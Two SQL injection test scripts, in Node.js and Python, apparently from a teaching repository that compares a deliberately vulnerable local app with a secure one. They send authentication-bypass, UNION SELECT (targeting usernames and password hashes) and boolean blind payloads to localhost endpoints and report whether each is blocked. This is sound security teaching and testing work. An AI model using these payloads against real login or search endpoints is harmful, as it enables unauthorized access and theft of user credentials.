File: implementations/nodejs-express/test_attacks.js
/**
 * SQL Injection Attack Testing Script for Node.js
 * Tests both vulnerable and secure implementations
 */

const http = require('http');

const VULNERABLE_URL = 'http://localhost:3001';
const SECURE_URL = 'http://localhost:3002';

function printHeader(text) {
    console.log('\n' + '='.repeat(70));
    console.log(`  ${text}`);
    console.log('='.repeat(70));
}

function makeRequest(url, method, path, body = null) {
    return new Promise((resolve, reject) => {
        const urlObj = new URL(url + path);
        const options = {
            hostname: urlObj.hostname,
            port: urlObj.port,
            path: urlObj.pathname + urlObj.search,
            method: method,
            headers: {
                'Content-Type': 'application/json'
            }
        };

        const req = http.request(options, (res) => {
            let data = '';
            res.on('data', (chunk) => { data += chunk; });
            res.on('end', () => {
                try {
                    resolve({ status: res.statusCode, data: JSON.parse(data) });
                } catch (e) {
                    resolve({ status: res.statusCode, data: data });
                }
            });
        });

        req.on('error', reject);
        
        if (body) {
            req.write(JSON.stringify(body));
        }
        
        req.end();
    });
}

async function testAuthBypass(baseUrl, versionName) {
    printHeader(`Testing Auth Bypass on ${versionName}`);
    
    const attacks = [
        { username: "admin' OR '1'='1'--", password: "anything" },
        { username: "admin'--", password: "" },
        { username: "' OR 1=1--", password: "" }
    ];
    
    for (let i = 0; i < attacks.length; i++) {
        const payload = attacks[i];
        console.log(`\nAttack ${i + 1}: ${payload.username}`);
        
        try {
            const response = await makeRequest(baseUrl, 'POST', '/api/login', payload);
            console.log(`Status: ${response.status}`);
            console.log(`Response: ${JSON.stringify(response.data, null, 2)}`);
            
            if (response.data.success) {
                console.log('🚨 VULNERABILITY CONFIRMED - Auth bypass successful!');
            } else {
                console.log('✅ Attack blocked');
            }
        } catch (error) {
            console.log(`❌ Error: ${error.message}`);
        }
    }
}

async function testUnionInjection(baseUrl, versionName) {
    printHeader(`Testing UNION Injection on ${versionName}`);
    
    const attacks = [
        "' UNION SELECT UserId, Username, Email FROM Users--",
        "' UNION SELECT 1, Username, PasswordHash FROM Users--"
    ];
    
    for (let i = 0; i < attacks.length; i++) {
        const payload = attacks[i];
        console.log(`\nAttack ${i + 1}: ${payload}`);
        
        try {
            const response = await makeRequest(baseUrl, 'GET', `/api/posts/search?q=${encodeURIComponent(payload)}`);
            console.log(`Status: ${response.status}`);
            
            if (response.data.success && response.data.posts.length > 0) {
                console.log(`🚨 Data extracted: ${response.data.posts.length} records`);
                console.log(`Sample: ${JSON.stringify(response.data.posts[0], null, 2)}`);
            } else {
                console.log('✅ Attack blocked');
            }
        } catch (error) {
            console.log(`❌ Error: ${error.message}`);
        }
    }
}

async function testBooleanBlind(baseUrl, versionName) {
    printHeader(`Testing Boolean Blind Injection on ${versionName}`);
    
    const attacks = [
        { payload: "' AND 1=1--", description: "True condition" },
        { payload: "' AND 1=2--", description: "False condition" }
    ];
    
    for (const attack of attacks) {
        console.log(`\nAttack: ${attack.payload} (${attack.description})`);
        
        try {
            const response = await makeRequest(baseUrl, 'GET', `/api/posts/search?q=${encodeURIComponent(attack.payload)}`);
            console.log(`Status: ${response.status}`);
            console.log(`Results: ${response.data.posts?.length || 0} posts`);
            
            if (response.data.success) {
                console.log('🚨 Query executed - boolean condition observable');
            } else {
                console.log('✅ Attack blocked');
            }
        } catch (error) {
            console.log(`❌ Error: ${error.message}`);
        }
    }
}

async function main() {
    console.log(`
    ╔═══════════════════════════════════════════════════════════╗
    ║      SQL Injection Testing Suite - Node.js Express        ║
    ║                                                           ║
    ║  Make sure both servers are running:                      ║
    ║  - Vulnerable: node vulnerable_app.js (port 3001)         ║
    ║  - Secure: node secure_app.js (port 3002)                ║
    ╚═══════════════════════════════════════════════════════════╝
    `);
    
    // Test vulnerable version
    console.log('\n\n' + '█'.repeat(70));
    console.log('█' + ' '.repeat(68) + '█');
    console.log('█' + ' '.repeat(20) + 'VULNERABLE VERSION' + ' '.repeat(30) + '█');
    console.log('█' + ' '.repeat(68) + '█');
    console.log('█'.repeat(70));
    
    await testAuthBypass(VULNERABLE_URL, 'Vulnerable App');
    await testUnionInjection(VULNERABLE_URL, 'Vulnerable App');
    await testBooleanBlind(VULNERABLE_URL, 'Vulnerable App');
    
    // Test secure version
    console.log('\n\n' + '█'.repeat(70));
    console.log('█' + ' '.repeat(68) + '█');
    console.log('█' + ' '.repeat(23) + 'SECURE VERSION' + ' '.repeat(31) + '█');
    console.log('█' + ' '.repeat(68) + '█');
    console.log('█'.repeat(70));
    
    await testAuthBypass(SECURE_URL, 'Secure App');
    await testUnionInjection(SECURE_URL, 'Secure App');
    await testBooleanBlind(SECURE_URL, 'Secure App');
    
    console.log('\n\n' + '='.repeat(70));
    console.log('Testing Complete!');
    console.log('='.repeat(70));
}

main().catch(console.error);

File: implementations/python-flask/test_attacks.py
"""
SQL Injection Attack Testing Script
Tests both vulnerable and secure implementations
"""

import requests
import json

VULNERABLE_URL = "http://localhost:5001"
SECURE_URL = "http://localhost:5002"

def print_header(text):
    print("\n" + "=" * 70)
    print(f"  {text}")
    print("=" * 70)

def test_auth_bypass(base_url, version_name):
    """Test authentication bypass attacks"""
    print_header(f"Testing Auth Bypass on {version_name}")
    
    attacks = [
        {"username": "admin' OR '1'='1'--", "password": "anything"},
        {"username": "admin'--", "password": ""},
        {"username": "' OR 1=1--", "password": ""},
    ]
    
    for i, payload in enumerate(attacks, 1):
        print(f"\nAttack {i}: {payload['username']}")
        try:
            response = requests.post(
                f"{base_url}/api/login",
                json=payload,
                timeout=5
            )
            print(f"Status: {response.status_code}")
            print(f"Response: {json.dumps(response.json(), indent=2)}")
            
            if response.json().get('success'):
                print("🚨 VULNERABILITY CONFIRMED - Auth bypass successful!")
            else:
                print("✅ Attack blocked")
        except Exception as e:
            print(f"❌ Error: {e}")

def test_union_injection(base_url, version_name):
    """Test UNION-based SQL injection"""
    print_header(f"Testing UNION Injection on {version_name}")
    
    attacks = [
        "' UNION SELECT UserId, Username, Email FROM Users--",
        "' UNION SELECT 1, Username, PasswordHash FROM Users--",
    ]
    
    for i, payload in enumerate(attacks, 1):
        print(f"\nAttack {i}: {payload}")
        try:
            response = requests.get(
                f"{base_url}/api/posts/search",
                params={'q': payload},
                timeout=5
            )
            print(f"Status: {response.status_code}")
            result = response.json()
            
            if result.get('success') and len(result.get('posts', [])) > 0:
                print(f"🚨 Data extracted: {len(result['posts'])} records")
                print(f"Sample: {json.dumps(result['posts'][0], indent=2)}")
            else:
                print("✅ Attack blocked")
        except Exception as e:
            print(f"❌ Error: {e}")

def test_boolean_blind(base_url, version_name):
    """Test boolean-based blind SQL injection"""
    print_header(f"Testing Boolean Blind Injection on {version_name}")
    
    attacks = [
        ("' AND 1=1--", "True condition"),
        ("' AND 1=2--", "False condition"),
    ]
    
    for payload, description in attacks:
        print(f"\nAttack: {payload} ({description})")
        try:
            response = requests.get(
                f"{base_url}/api/posts/search",
                params={'q': payload},
                timeout=5
            )
            print(f"Status: {response.status_code}")
            result = response.json()
            print(f"Results: {len(result.get('posts', []))} posts")
            
            if result.get('success'):
                print("🚨 Query executed - boolean condition observable")
            else:
                print("✅ Attack blocked")
        except Exception as e:
            print(f"❌ Error: {e}")

def main():
    print("""
    ╔═══════════════════════════════════════════════════════════╗
    ║        SQL Injection Testing Suite - Python Flask         ║
    ║                                                           ║
    ║  Make sure both servers are running:                      ║
    ║  - Vulnerable: python vulnerable_app.py (port 5001)       ║
    ║  - Secure: python secure_app.py (port 5002)              ║
    ╚═══════════════════════════════════════════════════════════╝
    """)
    
    # Test vulnerable version
    print("\n\n" + "█" * 70)
    print("█" + " " * 68 + "█")
    print("█" + " " * 20 + "VULNERABLE VERSION" + " " * 30 + "█")
    print("█" + " " * 68 + "█")
    print("█" * 70)
    
    test_auth_bypass(VULNERABLE_URL, "Vulnerable App")
    test_union_injection(VULNERABLE_URL, "Vulnerable App")
    test_boolean_blind(VULNERABLE_URL, "Vulnerable App")
    
    # Test secure version
    print("\n\n" + "█" * 70)
    print("█" + " " * 68 + "█")
    print("█" + " " * 23 + "SECURE VERSION" + " " * 31 + "█")
    print("█" + " " * 68 + "█")
    print("█" * 70)
    
    test_auth_bypass(SECURE_URL, "Secure App")
    test_union_injection(SECURE_URL, "Secure App")
    test_boolean_blind(SECURE_URL, "Secure App")
    
    print("\n\n" + "=" * 70)
    print("Testing Complete!")
    print("=" * 70)

if __name__ == '__main__':
    main()
Flask==3.0.0
pyodbc==5.0.1
SQLAlchemy==2.0.23

